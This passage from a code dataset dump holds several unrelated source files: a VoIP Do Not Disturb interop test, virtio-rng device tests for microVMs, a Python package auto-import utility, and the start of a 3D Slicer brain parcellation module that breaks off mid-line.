src_ip=self.serverproxy, dst_ip=dut1_ip, cseq=cseq1,\n call_id=callid1, search_string='true<',\n protocol='sip', exist=True, method='NOTIFY', return_header=False)\n log.info(\"Check if 200OK is send from Server to Phone1\")\n self.tshark.tshark_verify_message_and_response_with_200OK(\n capture_file, 'Request: NOTIFY', self.serverproxy, dut1_ip,\n callid1)\n\n log.info(\n \"Getting CSeq and CallID for NOTIFY of \"\n \"alternate phone from server\")\n cseq2, callid2 = self.tshark.tshark_get_method_cseq_call_id(\n capture_file, self.serverproxy, dut2_ip, 'Request: NOTIFY')\n log.info(\"Check if Do Not Disturb setting is requested as 'true'\")\n self.tshark.tshark_check_string_in_packet_bytes(\n capture_file, src_ip=self.serverproxy, dst_ip=dut2_ip, cseq=cseq2,\n call_id=callid2, search_string='true<',\n protocol='sip', exist=True, method='NOTIFY', return_header=False)\n log.info(\"Check if 200OK is send from Server to Phone2\")\n self.tshark.tshark_verify_message_and_response_with_200OK(\n capture_file, 'Request: NOTIFY', self.serverproxy, dut2_ip,\n callid2)\n\n log.info(\"Verified traces for ActivateDoNotDisturb\")\n log.info(\"End of test_activate_dnd_primaryphone\")\n\n def verify_dnd_on_phone(self, phone, dnd_skey):\n resp = phone.ccapi.get_mphone_state('GET_SOFTKEYS')\n for skey in resp:\n skey = skey.split(':')\n if dnd_skey in skey:\n log.info('DND is in sync with server')\n break\n else:\n raise AssertionError('DND is not in sync with server {}'.format(\n dnd_skey))\n\n\n# this is called by 'tng run'\n\ndef main():\n tng.api.runner()\n\n\nif __name__ == '__main__':\n 
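# hand main() to the tng framework's runner\n    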
tng.run(main)\n","sub_path":"common/IOT/Broadsoft_Interop/section_8/cc_shared/cmCC245538_3pcc_BS_IOT_Interop_149_ActivateDNDFromPrimaryPhone.py","file_name":"cmCC245538_3pcc_BS_IOT_Interop_149_ActivateDNDFromPrimaryPhone.py","file_ext":"py","file_size_in_byte":9427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"298812890","text":"# Copyright 2023 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\"\"\"Tests for the virtio-rng device\"\"\"\n\nfrom pathlib import Path\n\nimport pytest\n\nfrom framework.artifacts import NetIfaceConfig\nfrom framework.properties import global_props\nfrom framework.utils import check_entropy\n\nif global_props.instance == \"c7g.metal\" and global_props.host_linux_version == \"4.14\":\n pytestmark = pytest.mark.skip(reason=\"c7g requires no SVE 5.10 kernel\")\n\n\ndef _microvm_basic_config(microvm):\n microvm.spawn()\n microvm.basic_config()\n iface = NetIfaceConfig()\n microvm.add_net_iface(iface)\n\n\ndef _microvm_rng_config(microvm, rate_limiter=None):\n _microvm_basic_config(microvm)\n response = microvm.entropy.put(rate_limiter=rate_limiter)\n assert microvm.api_session.is_status_no_content(response.status_code), response.text\n\n\ndef _start_vm_with_rng(microvm, rate_limiter=None):\n _microvm_rng_config(microvm, rate_limiter)\n microvm.start()\n\n\ndef _start_vm_without_rng(microvm):\n _microvm_basic_config(microvm)\n microvm.start()\n\n\ndef test_rng_not_present(test_microvm_with_rng):\n \"\"\"\n Test a guest microVM *without* an entropy device and ensure that\n we cannot get data from /dev/hwrng\n \"\"\"\n\n vm = test_microvm_with_rng\n _start_vm_without_rng(vm)\n\n # If the guest kernel has been built with the virtio-rng module\n # the device should exist in the guest filesystem but we should\n # not be able to get random numbers out of it.\n cmd = \"test -e /dev/hwrng\"\n ecode, _, _ = vm.ssh.execute_command(cmd)\n assert ecode == 0\n\n cmd = \"dd if=/dev/hwrng of=/dev/null bs=10 count=1\"\n ecode, _, _ = vm.ssh.execute_command(cmd)\n assert ecode == 1\n\n\ndef test_rng_present(test_microvm_with_rng):\n \"\"\"\n Test a guest microVM with an entropy defined configured and ensure\n that we can access `/dev/hwrng`\n \"\"\"\n\n vm = test_microvm_with_rng\n _start_vm_with_rng(vm)\n\n check_entropy(vm.ssh)\n\n\ndef test_rng_snapshot(test_microvm_with_rng, microvm_factory):\n \"\"\"\n Test that a virtio-rng device is functional after resuming from\n a snapshot\n \"\"\"\n\n vm = test_microvm_with_rng\n _start_vm_with_rng(vm)\n\n check_entropy(vm.ssh)\n\n mem_path = Path(vm.jailer.chroot_path()) / \"test.mem\"\n snapshot_path = Path(vm.jailer.chroot_path()) / \"test.snap\"\n vm.pause_to_snapshot(\n mem_file_path=mem_path.name,\n snapshot_path=snapshot_path.name,\n )\n assert mem_path.exists()\n\n new_vm = microvm_factory.build()\n new_vm.spawn()\n iface = NetIfaceConfig()\n new_vm.create_tap_and_ssh_config(\n host_ip=iface.host_ip,\n guest_ip=iface.guest_ip,\n netmask_len=iface.netmask,\n tapname=iface.tap_name,\n )\n new_vm.ssh_config[\"ssh_key_path\"] = vm.ssh_config[\"ssh_key_path\"]\n new_vm.restore_from_snapshot(\n snapshot_vmstate=snapshot_path,\n snapshot_mem=mem_path,\n snapshot_disks=[vm.rootfs_file],\n )\n\n check_entropy(new_vm.ssh)\n\n\ndef _get_percentage_difference(measured, base):\n \"\"\"Return the percentage delta between the arguments.\"\"\"\n if measured == base:\n return 0\n try:\n return (abs(measured - base) / base) * 100.0\n except 
ZeroDivisionError:\n # It means base and only base is 0.\n return 100.0\n\n\ndef _throughput_units_multiplier(units):\n \"\"\"\n Parse the throughput units and return the multiplier that would\n translate the corresponding value to Bytes/sec\n \"\"\"\n if units == \"kB/s\":\n return 1000\n\n if units == \"MB/s\":\n return 1000 * 1000\n\n if units == \"GB/s\":\n return 1000 * 1000 * 1000\n\n raise Exception(\"Unknown units\")\n\n\ndef _process_dd_output(out):\n \"\"\"\n Parse the output of `dd` and return the achieved throughput in\n KB/sec.\n \"\"\"\n\n # Example `dd` output:\n #\n # $ dd if=/dev/hwrng of=/dev/null bs=100 count=1\n # 1+0 records in\n # 1+0 records out\n # 100 bytes (100 B) copied, 0.000749912 s, 133 kB/s\n\n # So we split the lines of the output and keep the last line.\n report = out.splitlines()[-1].split(\" \")\n\n # Last two items in the line are value and units\n (value, units) = (report[-2], report[-1])\n\n return float(value) * _throughput_units_multiplier(units) / 1000\n\n\ndef _get_throughput(ssh, random_bytes):\n \"\"\"\n Request `random_bytes` from `/dev/hwrng` and return the achieved\n throughput in KB/sec\n \"\"\"\n\n # Issue a `dd` command to request 100 times `random_bytes` from the device.\n # 100 here is used to get enough confidence on the achieved throughput.\n cmd = \"dd if=/dev/hwrng of=/dev/null bs={} count=100\".format(random_bytes)\n exit_code, _, stderr = ssh.execute_command(cmd)\n assert exit_code == 0, stderr.read()\n\n # dd gives its output on stderr\n return _process_dd_output(stderr.read())\n\n\ndef _check_entropy_rate_limited(ssh, random_bytes, expected_kbps):\n \"\"\"\n Ask for `random_bytes` from `/dev/hwrng` in the guest and check\n that achieved throughput is within a 10% of the expected throughput.\n\n NOTE: 10% is an arbitrarily selected limit which should be safe enough,\n so that we don't run into many intermittent CI failures.\n \"\"\"\n measured_kbps = _get_throughput(ssh, random_bytes)\n assert (\n _get_percentage_difference(measured_kbps, expected_kbps) <= 10\n ), \"Expected {} KB/s, measured {} KB/s\".format(expected_kbps, measured_kbps)\n\n\ndef _rate_limiter_id(rate_limiter):\n \"\"\"\n Helper function to return a name for the rate_limiter to be\n used as an id for parametrized tests.\n \"\"\"\n size = rate_limiter[\"bandwidth\"][\"size\"]\n refill_time = rate_limiter[\"bandwidth\"][\"refill_time\"]\n\n return \"{} KB/sec\".format(float(size) / float(refill_time))\n\n\n@pytest.mark.parametrize(\n \"rate_limiter\",\n [\n {\"bandwidth\": {\"size\": 1000, \"refill_time\": 100}},\n {\"bandwidth\": {\"size\": 10000, \"refill_time\": 100}},\n {\"bandwidth\": {\"size\": 100000, \"refill_time\": 100}},\n ],\n ids=_rate_limiter_id,\n)\ndef test_rng_bw_rate_limiter(test_microvm_with_rng, rate_limiter):\n \"\"\"\n Test that rate limiter without initial burst budget works\n \"\"\"\n vm = test_microvm_with_rng\n _start_vm_with_rng(vm, rate_limiter)\n\n size = rate_limiter[\"bandwidth\"][\"size\"]\n refill_time = rate_limiter[\"bandwidth\"][\"refill_time\"]\n\n expected_kbps = size / refill_time\n\n # Check the rate limiter using a request size equal to the size\n # of the token bucket.\n _check_entropy_rate_limited(vm.ssh, size, expected_kbps)\n","sub_path":"tests/integration_tests/functional/test_rng.py","file_name":"test_rng.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"338232551","text":"import os\nimport importlib\nimport 
logging\n\n\ntry:\n from malcolm.yamlutil import make_block_creator, make_include_creator\nexcept ImportError:\n make_creator = None\nelse:\n def make_creator(package_name):\n if package_name.startswith(\"malcolm.blocks.\"):\n return make_block_creator\n elif package_name.startswith(\"malcolm.includes.\"):\n return make_include_creator\n\n\ndef try_import_module(import_name):\n logging.debug(\"Importing %s\", import_name)\n try:\n return importlib.import_module(import_name)\n except Exception:\n logging.info(\"Importing %s failed\", import_name, exc_info=True)\n\n\ndef find_method_meta_decorated(module):\n for n in dir(module):\n cls = getattr(module, n)\n module_name = module.__name__.split(\".\")[-1]\n if n.lower() == module_name:\n if hasattr(cls, \"MethodMeta\"):\n logging.debug(\"Found child class %s\", cls)\n yield cls.__name__, cls\n\n\ndef find_package_contents(package_name, package_fs_path, fname):\n if fname.endswith(\".py\") and fname != \"__init__.py\":\n # import it and see what it produces\n import_name = \"%s.%s\" % (package_name, fname[:-3])\n logging.debug(\"Importing %s\", import_name)\n module = try_import_module(import_name)\n if module:\n for cls_name, cls in find_method_meta_decorated(module):\n yield cls_name, cls\n\n elif os.path.isdir(os.path.join(package_fs_path, fname)):\n # import it and add it to the list\n import_name = \"%s.%s\" % (package_name, fname)\n module = try_import_module(import_name)\n if module:\n yield fname, module\n elif fname.endswith(\".yaml\"):\n # check we need to do something with it (make_creator is None if malcolm could not be imported)\n creator = make_creator(package_name) if make_creator else None\n if creator:\n # load the yaml file and make an assembly out of it\n split = fname.split(\".\")\n assert len(split) == 2, \\\n \"Expected .yaml, got %r\" % fname\n yaml_path = os.path.join(package_fs_path, fname)\n logging.debug(\"Parsing %s\", yaml_path)\n with open(yaml_path) as f:\n text = f.read()\n try:\n func = creator(text)\n except Exception:\n logging.exception(\"Creating object from %s failed\", fname)\n else:\n yield split[0], func\n\n\ndef prepare_package(globals_d, package_name):\n \"\"\"Prepare a package namespace by importing all subclasses following PEP8\n rules that have @takes decorated functions, and all subpackages\"\"\"\n __all__ = prepare_globals_for_package(\n globals_d, package_name, find_package_contents)\n return __all__\n\n\ndef prepare_globals_for_package(globals_d, package_name, finder):\n\n update_dict = {}\n\n # this is the path to the package\n package_relative = package_name.split(\".\")[1:]\n package_fs_path = os.path.join(os.path.dirname(__file__), *package_relative)\n\n for f in os.listdir(package_fs_path):\n for name, ob in finder(package_name, package_fs_path, f):\n update_dict[name] = ob\n\n globals_d.update(update_dict)\n __all__ = list(update_dict)\n return __all__\n","sub_path":"malcolm/packageutil.py","file_name":"packageutil.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"585901181","text":"\nimport os\nimport unittest\nimport string\nimport vtk, qt, ctk, slicer\nfrom slicer.ScriptedLoadableModule import *\nfrom slicer.util import VTKObservationMixin\nimport logging\n\nfrom NeuroSegmentParcellationLibs.NeuroSegmentParcellationLogic import NeuroSegmentParcellationLogic\nfrom NeuroSegmentParcellationLibs.NeuroSegmentOutputToolWidget import NeuroSegmentOutputToolWidget\nfrom NeuroSegmentParcellationLibs.NeuroSegmentInputMarkupsWidget import NeuroSegmentInputMarkupsWidget\nfrom 
NeuroSegmentParcellationLibs.NeuroSegmentInputMarkupsFrame import NeuroSegmentInputMarkupsFrame\n\nclass NeuroSegmentParcellation(ScriptedLoadableModule, VTKObservationMixin):\n\n NEURO_PARCELLATION_LAYOUT_ID = 5613\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n VTKObservationMixin.__init__(self)\n self.parent.title = \"Neuroparcellation\"\n self.parent.categories = [\"HOA 2\", \"Neuro Segmentation and Parcellation\", \"Segmentation\"]\n self.parent.dependencies = [\"FreeSurferMarkups\"]\n self.parent.contributors = [\"Kyle Sunderland (Perk Lab, Queen's University)\"]\n self.parent.helpText = \"\"\"\nThis module can be used to create a surfaced based parcellation of FreeSurfer surfaces.\n\"\"\" # TODO: Add more help text + link to documentation.\n self.parent.helpText += self.getDefaultModuleDocumentationLink()\n self.parent.acknowledgementText = \"\"\"\nThis file was originally developed by Kyle Sunderland (Perk Lab, Queen's University), and was partially funded by Brigham and Women's Hospital through NIH grant R01MH112748\n\"\"\"\n if not slicer.app.commandOptions().noMainWindow:\n slicer.app.connect(\"startupCompleted()\", self.initializeModule)\n\n def initializeModule(self):\n #slicer.mrmlScene.SetUndoOn()\n defaultNodes = [\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLMarkupsFiducialNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLMarkupsCurveNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLMarkupsLineNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLMarkupsAngleNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLMarkupsClosedCurveNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLLinearTransformNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLCameraNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLViewNode\"),\n slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLSliceNode\"),\n ]\n for node in defaultNodes:\n node.UnRegister(None)\n\n for node in defaultNodes:\n node.UndoEnabledOn()\n slicer.mrmlScene.AddDefaultNode(node)\n self.setUndoOnExistingNodes()\n self.addObserver(slicer.mrmlScene, slicer.mrmlScene.EndImportEvent, self.setUndoOnExistingNodes)\n self.addObserver(slicer.mrmlScene, slicer.mrmlScene.EndCloseEvent, self.setUndoOnExistingNodes)\n\n # Setup shortcuts\n # TODO: When shortcuts are renabled in Slicer, the following section should be removed.\n def onRedo():\n slicer.mrmlScene.Redo()\n\n def onUndo():\n slicer.mrmlScene.Undo()\n\n redoShortcuts = []\n redoKeyBindings = qt.QKeySequence.keyBindings(qt.QKeySequence.Redo)\n for redoBinding in redoKeyBindings:\n redoShortcut = qt.QShortcut(slicer.util.mainWindow())\n redoShortcut.setKey(redoBinding)\n redoShortcut.connect(\"activated()\", onRedo)\n redoShortcuts.append(redoShortcut)\n\n undoShortcuts = []\n undoKeyBindings = qt.QKeySequence.keyBindings(qt.QKeySequence.Undo)\n for undoBinding in undoKeyBindings:\n undoShortcut = qt.QShortcut(slicer.util.mainWindow())\n undoShortcut.setKey(undoBinding)\n undoShortcut.connect(\"activated()\", onUndo)\n undoShortcuts.append(undoShortcut)\n\n self.setupLayout()\n\n @vtk.calldata_type(vtk.VTK_OBJECT)\n def setUndoOnExistingNodes(self, caller=None, eventId=None, node=None):\n # Camera nodes are not created using default\n cameraNodes = slicer.util.getNodesByClass(\"vtkMRMLCameraNode\")\n for cameraNode in cameraNodes:\n cameraNode.UndoEnabledOn()\n\n def setupLayout(self):\n layout = ('''\n\n \n \n \n \n O\n \n \n \n \n P\n \n \n \n \n I\n \n \n \n \n \n \n \n \n Axial\n R\n #F34A33\n \n \n \n \n Sagittal\n G\n 
#6EB04B\n \n \n \n \n Coronal\n Y\n #EDD54C\n \n \n \n \n''')\n layoutManager = slicer.app.layoutManager()\n layoutManager.layoutLogic().GetLayoutNode().AddLayoutDescription(\n NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID, layout)\n\nclass NeuroSegmentParcellationWidget(ScriptedLoadableModuleWidget, VTKObservationMixin):\n\n def __init__(self, parent):\n ScriptedLoadableModuleWidget.__init__(self, parent)\n VTKObservationMixin.__init__(self)\n self.logic = None\n self.parameterNode = None\n self.outputModelsWidget = None\n self.addObserver(slicer.mrmlScene, slicer.mrmlScene.EndImportEvent, self.onEndImportEvent)\n\n def setup(self):\n ScriptedLoadableModuleWidget.setup(self)\n\n # Load widget from .ui file (created by Qt Designer)\n uiWidget = slicer.util.loadUI(self.resourcePath('UI/NeuroSegmentParcellation.ui'))\n self.layout.addWidget(uiWidget)\n self.ui = slicer.util.childWidgetVariables(uiWidget)\n\n self.importTypeButtonGroup = qt.QButtonGroup()\n self.importTypeButtonGroup.addButton(self.ui.markupRadioButton)\n self.importTypeButtonGroup.addButton(self.ui.overlayRadioButton)\n\n self.importCountButtonGroup = qt.QButtonGroup()\n self.importCountButtonGroup.addButton(self.ui.singleOverlayRadioButton)\n self.importCountButtonGroup.addButton(self.ui.multipleOverlayRadioButton)\n\n self.ui.intersectionGlyphComboBox.addItem(\"Star burst\", slicer.vtkMarkupsGlyphSource2D.GlyphStarBurst)\n self.ui.intersectionGlyphComboBox.addItem(\"Cross\", slicer.vtkMarkupsGlyphSource2D.GlyphCross)\n self.ui.intersectionGlyphComboBox.addItem(\"Cross dot\", slicer.vtkMarkupsGlyphSource2D.GlyphCrossDot)\n self.ui.intersectionGlyphComboBox.addItem(\"Thick cross\", slicer.vtkMarkupsGlyphSource2D.GlyphThickCross)\n self.ui.intersectionGlyphComboBox.addItem(\"Dash\", slicer.vtkMarkupsGlyphSource2D.GlyphDash)\n self.ui.intersectionGlyphComboBox.addItem(\"Circle\", slicer.vtkMarkupsGlyphSource2D.GlyphCircle)\n self.ui.intersectionGlyphComboBox.addItem(\"Vertex\", slicer.vtkMarkupsGlyphSource2D.GlyphVertex)\n self.ui.intersectionGlyphComboBox.addItem(\"Triangle\", slicer.vtkMarkupsGlyphSource2D.GlyphTriangle)\n self.ui.intersectionGlyphComboBox.addItem(\"Square\", slicer.vtkMarkupsGlyphSource2D.GlyphSquare)\n self.ui.intersectionGlyphComboBox.addItem(\"Diamond\", slicer.vtkMarkupsGlyphSource2D.GlyphDiamond)\n self.ui.intersectionGlyphComboBox.addItem(\"Arrow\", slicer.vtkMarkupsGlyphSource2D.GlyphArrow)\n self.ui.intersectionGlyphComboBox.addItem(\"Thick arrow\", slicer.vtkMarkupsGlyphSource2D.GlyphThickArrow)\n self.ui.intersectionGlyphComboBox.addItem(\"Hooked arrow\", slicer.vtkMarkupsGlyphSource2D.GlyphHookedArrow)\n\n # Set scene in MRML widgets. 
Make sure that in Qt designer\n # \"mrmlSceneChanged(vtkMRMLScene*)\" signal in is connected to each MRML widget's.\n # \"setMRMLScene(vtkMRMLScene*)\" slot.\n uiWidget.setMRMLScene(slicer.mrmlScene)\n\n # Create a new parameterNode\n # This parameterNode stores all user choices in parameter values, node selections, etc.\n # so that when the scene is saved and reloaded, these settings are restored.\n self.logic = NeuroSegmentParcellationLogic()\n self.logic.setQueryNodeFileName(self.resourcePath('Parcellation/parcellation.qry'))\n self.ui.parameterNodeSelector.addAttribute(\"vtkMRMLScriptedModuleNode\", \"ModuleName\", self.moduleName)\n\n self.inputCurvesWidget = NeuroSegmentInputMarkupsFrame(self.logic, \"vtkMRMLMarkupsCurveNode\")\n self.ui.inputCurvesCollapsibleButton.layout().addWidget(self.inputCurvesWidget)\n\n self.inputPlanesWidget = NeuroSegmentInputMarkupsFrame(self.logic, \"vtkMRMLMarkupsPlaneNode\")\n self.ui.inputPlanesCollapsibleButton.layout().addWidget(self.inputPlanesWidget)\n\n self.setParameterNode(self.logic.getParameterNode())\n\n # Connections\n self.ui.parameterNodeSelector.connect('currentNodeChanged(vtkMRMLNode*)', self.setParameterNode)\n self.ui.parameterNodeSelector.connect('nodeAdded(vtkMRMLNode*)', self.onParameterNodeAdded)\n self.ui.loadQueryButton.connect('clicked(bool)', self.onLoadQuery)\n self.ui.applyButton.connect('clicked(bool)', self.onApplyButton)\n self.ui.exportButton.connect('clicked(bool)', self.onExportButton)\n self.ui.exportLabelButton.connect('clicked(bool)', self.onExportLabelButton)\n\n self.ui.markupRadioButton.connect(\"toggled(bool)\", self.updateImportWidget)\n self.ui.overlayRadioButton.connect(\"toggled(bool)\", self.updateImportWidget)\n self.ui.singleOverlayRadioButton.connect(\"toggled(bool)\", self.updateImportWidget)\n self.ui.multipleOverlayRadioButton.connect(\"toggled(bool)\", self.updateImportWidget)\n\n self.ui.importMarkupComboBox.connect('currentNodeChanged(vtkMRMLNode*)', self.updateImportWidget)\n self.ui.destinationMarkupComboBox.connect('currentNodeChanged(vtkMRMLNode*)', self.updateImportWidget)\n self.ui.destinationMarkupComboBox.addAttribute(\"vtkMRMLMarkupsNode\", self.logic.NODE_TYPE_ATTRIBUTE_NAME, self.logic.ORIG_NODE_ATTRIBUTE_VALUE)\n self.ui.importOverlayComboBox.connect('currentIndexChanged(int)', self.updateImportWidget)\n self.ui.destinationModelComboBox.connect('currentNodeChanged(vtkMRMLNode*)', self.updateImportWidget)\n self.ui.destinationModelComboBox.addAttribute(\"vtkMRMLModelNode\", self.logic.NEUROSEGMENT_OUTPUT_ATTRIBUTE_VALUE, str(True))\n self.ui.importButton.connect('clicked()', self.onImportButton)\n\n # These connections ensure that whenever user changes some settings on the GUI, that is saved in the MRML scene\n # (in the selected parameter node).\n self.ui.origModelSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.updateParameterNodeFromGUI)\n self.ui.pialModelSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.updateParameterNodeFromGUI)\n self.ui.inflatedModelSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.updateParameterNodeFromGUI)\n self.ui.exportSegmentationSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.updateParameterNodeFromGUI)\n\n self.ui.curvRadioButton.connect(\"toggled(bool)\", self.updateScalarOverlay)\n self.ui.sulcRadioButton.connect(\"toggled(bool)\", self.updateScalarOverlay)\n self.ui.labelsRadioButton.connect(\"toggled(bool)\", self.updateScalarOverlay)\n\n slicer.app.layoutManager().connect(\"layoutChanged(int)\", 
self.onLayoutChanged)\n self.ui.parcellationViewLayoutButton.connect(\"clicked()\", self.onParcellationViewLayoutButtonClicked)\n\n self.ui.planeIntersectionCheckBox.connect(\"toggled(bool)\", self.onPlaneCheckBox)\n\n self.ui.labelOutlineCheckBox.connect(\"toggled(bool)\", self.onLabelOutlineCheckBox)\n\n self.ui.origMarkupsCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.pialMarkupsCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.inflatedMarkupsCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n\n self.ui.lineViewRedCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.lineViewGreenCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.lineViewYellowCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n\n self.ui.intersectionViewRedCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.intersectionViewGreenCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n self.ui.intersectionViewYellowCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n\n self.ui.intersectionGlyphComboBox.connect(\"currentIndexChanged(int)\", self.updateMarkupDisplay)\n self.ui.curveIntersectionScaleSlider.connect(\"valueChanged(double)\", self.updateMarkupDisplay)\n\n self.ui.controlPointVisibilityCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n\n self.ui.labelVisibilityCheckBox.connect(\"toggled(bool)\", self.updateMarkupDisplay)\n\n self.oldLayout = slicer.app.layoutManager().layout\n\n # Set path to query file\n self.ui.queryFilePathEdit.currentPath = self.logic.getQueryNodeFileName()\n\n # Initial GUI update\n self.updateGUIFromParameterNode()\n self.updateOutputStructures()\n self.onLayoutChanged()\n self.updateImportWidget()\n\n def enter(self):\n parcellationViewLayoutOpen = slicer.app.layoutManager().layout == NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID\n self.ui.parcellationViewLayoutButton.setChecked(parcellationViewLayoutOpen)\n self.logic.updateModelNodes()\n\n def onParcellationViewLayoutButtonClicked(self):\n if self.ui.parcellationViewLayoutButton.checked:\n self.openParcellationlayout()\n else:\n self.closeParcellationLayout()\n parcellationViewLayoutOpen = slicer.app.layoutManager().layout == NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID\n self.ui.parcellationViewLayoutButton.setChecked(parcellationViewLayoutOpen)\n\n def openParcellationlayout(self):\n if slicer.app.layoutManager().layout == NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID:\n return\n self.oldLayout = slicer.app.layoutManager().layout\n slicer.app.layoutManager().setLayout(NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID)\n slicer.util.getNode(\"ViewO\").LinkedControlOn()\n\n def closeParcellationLayout(self):\n if slicer.app.layoutManager().layout != NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID:\n return\n\n if self.oldLayout == NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID:\n self.oldLayout = slicer.vtkMRMLLayoutNode.SlicerLayoutFourUpView\n slicer.app.layoutManager().setLayout(self.oldLayout)\n\n def onLayoutChanged(self):\n viewNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLViewNodeI\")\n if viewNode:\n self.addInteractorObservers(viewNode)\n viewNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLViewNodeO\")\n if viewNode:\n self.addInteractorObservers(viewNode)\n viewNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLViewNodeP\")\n if viewNode:\n self.addInteractorObservers(viewNode)\n parcellationViewLayoutOpen = 
slicer.app.layoutManager().layout == NeuroSegmentParcellation.NEURO_PARCELLATION_LAYOUT_ID\n self.ui.parcellationViewLayoutButton.setChecked(parcellationViewLayoutOpen)\n\n def addInteractorObservers(self, viewNode):\n if viewNode is None:\n return\n\n layoutManager = slicer.app.layoutManager()\n view = layoutManager.threeDWidget(viewNode.GetName()).threeDView()\n interactor = view.interactor()\n if not self.hasObserver(interactor, vtk.vtkCommand.MouseMoveEvent, self.onMouseMoveIn3DView):\n self.addObserver(interactor, vtk.vtkCommand.MouseMoveEvent, self.onMouseMoveIn3DView)\n\n interactionNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLInteractionNodeSingleton\")\n if not self.hasObserver(interactionNode, slicer.vtkMRMLInteractionNode.InteractionModeChangedEvent, self.onInteractionModeChanged):\n self.addObserver(interactionNode, slicer.vtkMRMLInteractionNode.InteractionModeChangedEvent, self.onInteractionModeChanged)\n\n def onInteractionModeChanged(self, interactionNode, event=None):\n if interactionNode is None:\n return\n\n selectionNode = slicer.app.applicationLogic().GetSelectionNode()\n if selectionNode is None:\n return\n\n currentPlaceNode = slicer.mrmlScene.GetNodeByID(selectionNode.GetActivePlaceNodeID())\n nodeType = currentPlaceNode.GetAttribute(self.logic.NODE_TYPE_ATTRIBUTE_NAME)\n if nodeType is None:\n return\n\n if currentPlaceNode.IsA(\"vtkMRMLMarkupsCurveNode\") and nodeType == self.logic.ORIG_NODE_ATTRIBUTE_VALUE:\n self.logic.onMasterMarkupModified(currentPlaceNode)\n elif nodeType == self.logic.PIAL_NODE_ATTRIBUTE_VALUE or nodeType == self.logic.INFLATED_NODE_ATTRIBUTE_VALUE:\n self.logic.onDerivedControlPointsModified(currentPlaceNode)\n\n def onMouseMoveIn3DView(self, caller, event=None):\n if caller is None:\n return\n\n interactionNode = slicer.mrmlScene.GetNodeByID(\"vtkMRMLInteractionNodeSingleton\")\n if interactionNode is None or interactionNode.GetCurrentInteractionMode() != interactionNode.Place:\n return\n\n selectionNode = slicer.app.applicationLogic().GetSelectionNode()\n\n viewNode = None\n layoutManager = slicer.app.layoutManager()\n for i in range(layoutManager.threeDViewCount):\n viewWidget = layoutManager.threeDWidget(i)\n view = viewWidget.threeDView()\n interactor = view.interactor()\n if not interactor is caller:\n continue\n viewNode = viewWidget.mrmlViewNode()\n\n nodeName = \"\"\n if viewNode:\n nodeName = viewNode.GetName()\n\n currentPlaceNode = slicer.mrmlScene.GetNodeByID(selectionNode.GetActivePlaceNodeID())\n nodeType = currentPlaceNode.GetAttribute(self.logic.NODE_TYPE_ATTRIBUTE_NAME)\n if nodeType is None:\n return\n\n origNode = None\n pialNode = None\n inflatedNode = None\n if nodeType == self.logic.ORIG_NODE_ATTRIBUTE_VALUE:\n origNode = currentPlaceNode\n pialNode = self.logic.getDerivedControlPointsNode(origNode, self.logic.PIAL_NODE_ATTRIBUTE_VALUE)\n inflatedNode = self.logic.getDerivedControlPointsNode(origNode, self.logic.INFLATED_NODE_ATTRIBUTE_VALUE)\n elif nodeType == self.logic.PIAL_NODE_ATTRIBUTE_VALUE:\n origNode = currentPlaceNode.GetNodeReference(\"OrigMarkup\")\n pialNode = currentPlaceNode\n inflatedNode = self.logic.getDerivedControlPointsNode(origNode, self.logic.INFLATED_NODE_ATTRIBUTE_VALUE)\n elif nodeType == self.logic.INFLATED_NODE_ATTRIBUTE_VALUE:\n origNode = currentPlaceNode.GetNodeReference(\"OrigMarkup\")\n pialNode = self.logic.getDerivedControlPointsNode(origNode, self.logic.PIAL_NODE_ATTRIBUTE_VALUE)\n inflatedNode = currentPlaceNode\n\n if (nodeName == \"ViewI\" and nodeType == 
